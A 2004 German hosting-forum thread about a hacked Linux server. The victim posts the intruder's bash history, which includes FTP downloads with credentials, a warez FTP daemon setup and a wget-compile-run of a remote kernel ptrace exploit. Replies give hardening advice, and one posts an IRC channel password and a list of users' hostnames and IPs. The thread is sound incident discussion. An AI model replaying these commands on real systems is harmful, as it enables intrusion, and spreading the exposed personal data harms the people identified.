Server wurde gehackt *_*

Lesenswerte Artikel, Anleitungen und Diskussionen
recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 02:50

Blub !

Heute hats meine Kiste erwischt so wie ich es sehe sit er über nen Kernel Bug drauf gekommen.

Hier mal ein Auszug aus der .bash/history Hacker hat nicht aufgeraümt :)

Code: Select all

uname -a
cd /var/tmp
ls -al
mkdir ...
cd ...
dir
ftp 213.161.194.226 2400
chmod 777 *
./cy -d
dir
tar -xzf open*
cd open*
./configure
make
mkdir ../site
cd sta*/etc
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
cd ..
dir
cd log
dir
cat ftpd.err
netstat -an
cd ../etc
dir
rm ftpd.reg
wget ftp://root:r0xx0r@213.161.194.226:2400/ftpd.reg
../sbin/ftpd
/sbin/ifconfig
cd /proc
dir
cd net
dir
cat netlink
cat netstat
exit
dir
cd psy*
dir
cat psybnc.conf
cd /var/tmp/
dir
cd ...
dir
rm cy
rm ek*
cd open*
cd stan*/bin
dir
ftp 213.161.194.226 2400
tar -xzf poe-1*
cd poe*
cd POE*
perl Makefile.PL
make
cp -irf POE* ../
cd ..
tar -xzf poe-c*
cd POE-C*
perl Makefile.PL
make
dir
cp IRC.pm ../POE/Component/
cp Filter-IRC.pm ../POE/Filter/IRC.pm
cp Filter-CTCP.pm ../POE/Filter/CTCP.pm
cd ..
dir
ftp 213.161.194.226 2400
perl perlbot.pl
cd ../etc
cat default.cfg
cat sections.cfg
echo "">sections.cfg
cd sections
cp /var/tmp/.../site/*cfg ./
cd ../../bin
screen
ssh 62.141.54.185 -l test
exit
df
cd /var/tmp/...
dir
cd open*
cd stan*/etc/
cat sections.cfg
cd sections*
cat default.cfg
cd ../../sbin
./ftpd
cd ../bin
cat /var/tmp/.../pidfile
kill -9 28223
screen
../sbin/ftpd
cd /var/tmp/.../
dir
cat announce
cat pidfile
cat ann
/var/tmp/.../openftpd-0.29.4/standard/sbin/ftpd
exit
hostname -f
jah
uname -a
df
cd /
cd tmp
wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace 
rm kernelptrace
rm kernelptrace.c 
nano test.c
pico test.c
make test
./test 
rm test
rm test.c 
Oder liege ich da falsch ?

Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?

Bye Keule

sascha
RSAC
Posts: 1345
Joined: 2002-04-22 23:08

Re: Server wurde gehackt *_*

Post by sascha » 2004-05-23 03:31

Reicht ein Kernelupdate oder soll ich die Kiste neu aufsetzen ?
Bitte sag mir dass die Frage nicht ernst gemeint ist.

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 03:40

Ja ist ne dumme Frage ich weiss *_* hab aber sowas von 0 Bock die Kiste neu aufzusetzen, da steckt so viel Zeit drinnen :cry:

Scheiss Script Kiddys. :cry:

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: Server wurde gehackt *_*

Post by r00ty » 2004-05-23 04:58

vorher wicher dir nochmal die logs damit du nachschauen kannst wo sie reingekommen sind

mutombo
Posts: 184
Joined: 2003-06-19 06:10

Re: Server wurde gehackt *_*

Post by mutombo » 2004-05-23 05:26

naja sonderlich clever sind die jungs nicht.

auf obigem ftp liegt ein perlscript für nen ftpbot, da steht server und pass der jungs drinne.

sind im efnet channel #stillhunted pass: 040404

kleine liste der user:

Code: Select all

#stillhunted _|p3rr0| H Jahwe@psybnc-user.gateway01.sHell1.de :4 _|p3rr0|
#stillhunted auzzi H ~auzzi@ati56.ati.ac.at :6 auzzi
#stillhunted anton52 H ~an@p5088E26E.dip0.t-ipconnect.de :3 anton52
#stillhunted beOND H KriZZ@pD956064D.dip.t-dialin.net :5 xxx
#stillhunted Indz|away H ~Indz@p50825CCB.dip.t-dialin.net :0 Indz
#stillhunted Zero_Cool H ~blabla@beh-ps.labs.pitt.edu :6 blabla
#stillhunted ACIID H ~lala@pD9FFF2C8.dip.t-dialin.net :0 ACIID
#stillhunted SiNUZ H ~123@beh-ps.labs.pitt.edu :5 321
#stillhunted |cartman- H ~netgear@h00508bf993b6.ne.client2.attbi.com :0 |cartman-
#stillhunted kichi H ~bitch@bliss.icemind.com :4 kichi
#stillhunted |Peach| H ~Peach@germol2-hosting.Kyiv.wnet.ua :4 |Peach|
#stillhunted bAsT|AWAY H dick@ns2.host-media.de :3 dick
#stillhunted SiL`- H SiL_@1337.vhost.at :3 SiL_
#stillhunted TU_GRAZ H ~AT-B0T@fstgal12.tu-graz.ac.at :0 GH
#stillhunted Koki|OFF H ~Koki@141.211.34.71 :4 Koki
#stillhunted deeflow H@ ~deeflow@in.meiner.jugend.bekam.ich.nur.Speed.und-cola.de :3 deeflow
#stillhunted mobber H@ ~mobber@ns3334.ovh.net :4 mobber
#stillhunted peer2k H muffin@chillt.im.garten-zum-traeumen.de :3 muffin
#stillhunted muhra|w H@ ~sexme@ns3334.ovh.net :4 sex
#stillhunted RaToR H tabaluga@kann.whois.lamer.nicht-leiden.de :3 Rator
#stillhunted RiMP^off H@ ~rimp@ns3334.ovh.net :5 rimp
#stillhunted Sky-Line- H@ Fox@tsg-ops.ath.cx :5 woops
#stillhunted ICET H+ rubby@frisst.kleine.kind3r.de :5 IceT
sind schon ein paar interessante ips dabei mit denen man recht einfach den realen besitzer zuordenen kann.

normalerweise hab ich ja nen gewissen respekt vor "hackern", aber das war ziemlich amateurhaft.

sieh mal zu das die einen auf den deckel bekommen :)

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server wurde gehackt *_*

Post by captaincrunch » 2004-05-23 07:53

da steckt so viel Zeit drinnen
Und dann hattest du nicht einmal die Zeit, einen halbwegs sicheren Kernel zu installieren? *kopfschüttel*

Mal ernsthaft: mach die Kiste platt und bügel Backups drüber, selbst wenn du es hier definitiv nicht mit "Hackern", sondern mit anfängerhaften Scriptkiddies zu tun hast.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 13:42

IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Server wurde gehackt *_*

Post by captaincrunch » 2004-05-23 13:58

Der FTP mag leer sein, aber woher nimmst du die Sicherheit, dass nicht doch noch irgendwelchen "Hinterlassenschaften" da sind?
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

thomas80
Posts: 20
Joined: 2004-05-23 14:12

Re: Server wurde gehackt *_*

Post by thomas80 » 2004-05-23 14:15

Hallo,

hier kommt gleich mal die grosse böse noob-Frage: In der obig aufgelisteten bash hat der Angreifer doch schon root-Zugriff gehabt, oder nicht? Du sagtest ja, den hätte er über einen Kernel-exploit bekommen...muss man dazu eigentlich schon shell-Zugriff haben?? Und wie hat er den dann bekommen??

Gruß, Thomas

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 14:22

das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.

geflashed hat er den ganzen Stuff von seinem Server 62.141.54.185 62 GB MP3's genutzt wurde das Programm openftpd mit einigen Plugins, wie z.B IRC Abfrage aus Ihrem Channel, wie mutombo bereits schrieb

efnet channel #stillhunted pass: 040404


@CaptainCrunch laut bash history wurde nichts weiteres gemacht ausser openftpd installation und flashen, werde aber die Kiste neu installieren.

Hab deren FTP geflashed und auf CD gebrannt, die CD geht mit zur Anzeige.

Waren recht dumme Script Kiddies, da sie noch nicht mal Ihre Spuren verwischt haben.

Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.

Man lernt erst wenn man eine drauf bekommt.

xyloid
Posts: 27
Joined: 2003-11-16 09:27

Re: Server wurde gehackt *_*

Post by xyloid » 2004-05-23 14:30

Recoilmaster wrote: Kernel Bug wurde nicht genutzt, sie haben ein pass generator prog auf Ihrem FTP, mein pw war mit drinnen :/ war leider auch recht simpel, von daher selber schuld.
wie kann man auch bloß ein pw nehmen, das man womöglich noch in irgendeinem wörterbuch findet oder das sich von diesem "pass generator" ermitteln lässt.
wie du schon gesagt hast: da biste selbst schuld ;)

Nico

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server wurde gehackt *_*

Post by Joe User » 2004-05-23 14:35

Bleibt nur zu hoffen, dass Deine anderen 27 (Kunden)Server besser administriert werden...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

wgot
RSAC
Posts: 1707
Joined: 2003-07-06 02:03

Re: Server wurde gehackt *_*

Post by wgot » 2004-05-23 14:36

Recoilmaster wrote:... für den Angriff hat er den User Test genutzt.
ganz sicher der optimale Username für einen SSH-Account! :roll: :oops:

Gruß, Wolfgang

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 14:41

Meine Meinung :lol:

Nie damit gerechnet und seid 1 Jahr nie was vorgefallen, von daher :cry:
Last edited by recoilmaster on 2004-05-23 14:42, edited 1 time in total.

oxygen
RSAC
Posts: 2179
Joined: 2002-12-15 00:10
Location: Bergheim

Re: Server wurde gehackt *_*

Post by oxygen » 2004-05-23 14:42

Recoilmaster wrote:das ganze lief unter Benutzer nicht root Rechte, für den Angriff hat er den User Test genutzt.
Natürlich hatte er Rootrechte, was glaubst du was
wget reve.dhs.org/kernelptrace.c
make kernelptrace
./kernelptrace
macht...

Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Last edited by oxygen on 2004-05-23 14:44, edited 1 time in total.

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-23 14:43

Exploit für Kernel 2.20 ich weiss *_*

compositiv
Posts: 193
Joined: 2003-01-22 14:58
Location: Hamburg

Re: Server wurde gehackt *_*

Post by compositiv » 2004-05-23 14:56

Recoilmaster wrote:IP's gesammelt und Anzeige gegen unbekannt am Montag. Da wird sowieso nix draus, aber probieren kann manns *_*
Vor allem wollen die Jungs den kompletten Rechner, dd-Image, Datenträger o.ä. reicht denen, zumindest in Hamburg, nicht.
Und wenn der Rechner nicht gemietet ist, sondern eine selbstangeschaffte "Hochleistungs"-maschine ist, wird da teilweise schon eine Menge Kapital unnötigerweise gebunden.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11583
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server wurde gehackt *_*

Post by Joe User » 2004-05-23 15:07

PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

silentfog
Posts: 55
Joined: 2003-09-16 03:39

Re: Server wurde gehackt *_*

Post by silentfog » 2004-05-24 20:23

Recoilmaster wrote:Exploit für Kernel 2.20 ich weiss *_*
Du hast aber nicht zufällig u. a. die Domains megafoxes.de, europefashion.de etc. ?
Auf http://www.zone-h.org/en/defacements/fi ... domain=de/ kann man denn auch wieder einen 'tüchtigen' und 'verantwortungsvollen' Admin finden:

Code: Select all

r00t_System owns your Linux!!!
id
uid=0(root) gid=0(root)

uname -a
Linux p15137761 2.4.20 #1 SMP Sun Dec 1 21:25:43 CET 2002 i686 unknown
Kopfschüttel :?: Stef.

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-24 20:47

nö sind nicht meine :)

Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.

silentfog
Posts: 55
Joined: 2003-09-16 03:39

Re: Server wurde gehackt *_*

Post by silentfog » 2004-05-24 20:55

Recoilmaster wrote:nö sind nicht meine :)

Auf allen Kisten is nu neuster Kernel drauf + neue Passwörter + ssh2 *_* - sowas passiert mir nicht noch mal.
Hoffentlich :wink:
BTW. warum nicht gleich so :?:

recoilmaster
Posts: 188
Joined: 2003-10-02 10:35

Re: Server wurde gehackt *_*

Post by recoilmaster » 2004-05-24 22:15

Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*

arnee
Posts: 54
Joined: 2003-09-30 21:32

Re: Server wurde gehackt *_*

Post by arnee » 2004-05-24 22:52

Besonders die 1&1 IP-Netze sind IMHO besonders gefährdet, weil die ganzen AutoExploit-Programme diese Netze wohl zuerst scannen, da sie dort wohl den quantitativ größten Erfolg haben dürften.

silentfog
Posts: 55
Joined: 2003-09-16 03:39

Re: Server wurde gehackt *_*

Post by silentfog » 2004-05-24 23:32

Recoilmaster wrote:Hab gedacht das mir sowas nicht passiert 8O , wie gesagt erst muss was apssieren bevor manns lernt *_*
:roll: Sorry folks - :? Aber da machen sich soviele Leute hier im Forum die größte Mühe und posten sich die Finger wund, opfern Ihre Freizeit, schauen auch über die eine oder ander "Unglaublichkeit" hinweg :!:

Natürlich auch aus Freude an der "Sache" selbst, aber es ist immer eine Art "Selbstlosigkeit" dabei ...

Und nun denke einmal darüber nach, Du hast ja immerin schon Beiträge: 253, was Deine Aussage eigentlich impliziert ... :( - Denkst Du nicht, daß sich manch einer dann fragt : "Warum poste ich eigentlich ..."

Eigentlich kann es jedem "relativ Wurst" sein, was Du mit Deinem Server machst - Du bist letztendlich verantwortlich ...

Aber "wurmen" tut es einen dann doch , sprich es gehen einem dann doch so Gedanken durch den Kopf, wie : " Sag' mal , spinn ich, lese ich da wirklich ... - gibt's doch nicht - steht doch g e n u g und a u s f ü h r l i c h im rootforum.

Aber sicher hast Du recht, "bevor man sich nicht die Finger verbrannt hat, kennt man die Bedeutung von HEISS nicht ...

:roll: Stef.

konni
Posts: 151
Joined: 2002-12-16 10:05

Re: Server wurde gehackt *_*

Post by konni » 2004-06-02 12:14

øxygen wrote: Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.